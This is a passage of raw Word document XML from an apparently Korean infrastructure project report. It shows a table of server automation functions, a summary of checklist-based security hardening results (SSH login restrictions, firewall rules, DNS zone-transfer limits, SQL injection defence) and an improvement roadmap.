          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Monitorix 설치/재시작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-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systemctl status monitorix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>install_gnome(), main()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Rocky9(MB)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>XRDP + GNOME + user 생성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user:team1, PW: (마스킹)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xrdp active(3389)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>install(), mod_zone()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Rocky9(DNS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>BIND + zone + 동적 A 레코드 편집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dns_data.txt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nslookup 성공</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>format_partition(), main()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Ubuntu(ST-R5/10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Partition/FMT/ext4 + fstab + Disk Quota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/dev/sda1, /jupyter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repquota 제한 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>cc(cmd)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>모든 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 명령 실행 + 출력 파싱/오류 처리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임의 cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1247" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>stdout/stderr 실시간 출력</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-17. 주정통 기반 보안점검 결과(요약, 편집용)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점검 영역</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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점검 항목(기준)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점검 방법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대상</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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결과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조치/비고</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020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증빙 ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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접근통제</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>root 원격 로그인 금지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수동/자동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SSH 대상 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>PermitRootLogin no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TERM-5-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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접근통제</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SSH 패스워드 로그인 금지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수동/자동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SSH 대상 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>PasswordAuthentication no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TERM-5-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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네트워크</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관리망만 SSH 허용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수동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SSH 대상 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>UFW allow/deny 규칙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TERM-5-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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네트워크</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>브루트포스/스캔 차단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수동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SSH 대상 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>iptables recent 규칙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TERM-5-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>AXFR 제한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수동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DNS 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TCP 53 제한 + Secondary DNS 허용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>LOG-5-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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웹</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>정찰 차단(내부 전용 시)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선택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웹 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>80/443 접근대역 제한</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>TERM-5-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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애플리케이션</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SQLi 방어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수동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웹 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>WAF/코드 보완 필요</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>LOG-5-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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관제</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>필수 로그 수집/제출 기준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운영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전 서버</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>완료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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>표준 제출 항목 정의</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>표 5-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>(추가 기입)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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="680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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2154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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020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</w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-18. 보완 필요 항목 및 개선 로드맵(예시)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w="1020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구분</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948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항목</w:t>
            </w:r>
          </w:p>
        </w:tc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현황</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608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개선 방향</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:b/>
              </w:rPr>
              <w:t>우선순위</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>웹</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>SQLi/Command Injection 근본 방어</w:t>
            </w:r>
          </w:p>
        </w:tc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L3/L4 차단 한계</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>WAF 도입 및 취약 기능 제거/패치</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>상</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관제</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Snort 룰 튜닝 및 오탐 관리</w:t>
            </w:r>
          </w:p>
        </w:tc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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>시나리오별 룰 검증 및 상시 정책 반영</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>중</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>운영</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>로그 중앙수집/보관</w:t>
            </w:r>
          </w:p>
        </w:tc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(기입)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>Syslog/ELK 등 중앙 수집 및 보관 주기 정의</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>중</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>가용성</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>DoS 완화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>기본 SYN cookies 의존</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2608" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>레이트리밋/상위 장비 ACL/캐시 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="794" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>중</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5-9. 주정통 점검 결과 대시보드(증빙)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="3118" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: IMG-5-09</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>점검 결과를 DB 저장 및 웹 가시화한 화면(리스트/상세/필터/엑셀 출력 등) 캡처 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/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rPr>
      <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
      <w:sz w:val="22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sinu</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-06T07:49:36Z</dcterms:modified>
  <cp:version>1200.0100.01</cp:version>
</cp:coreProperties>
</file>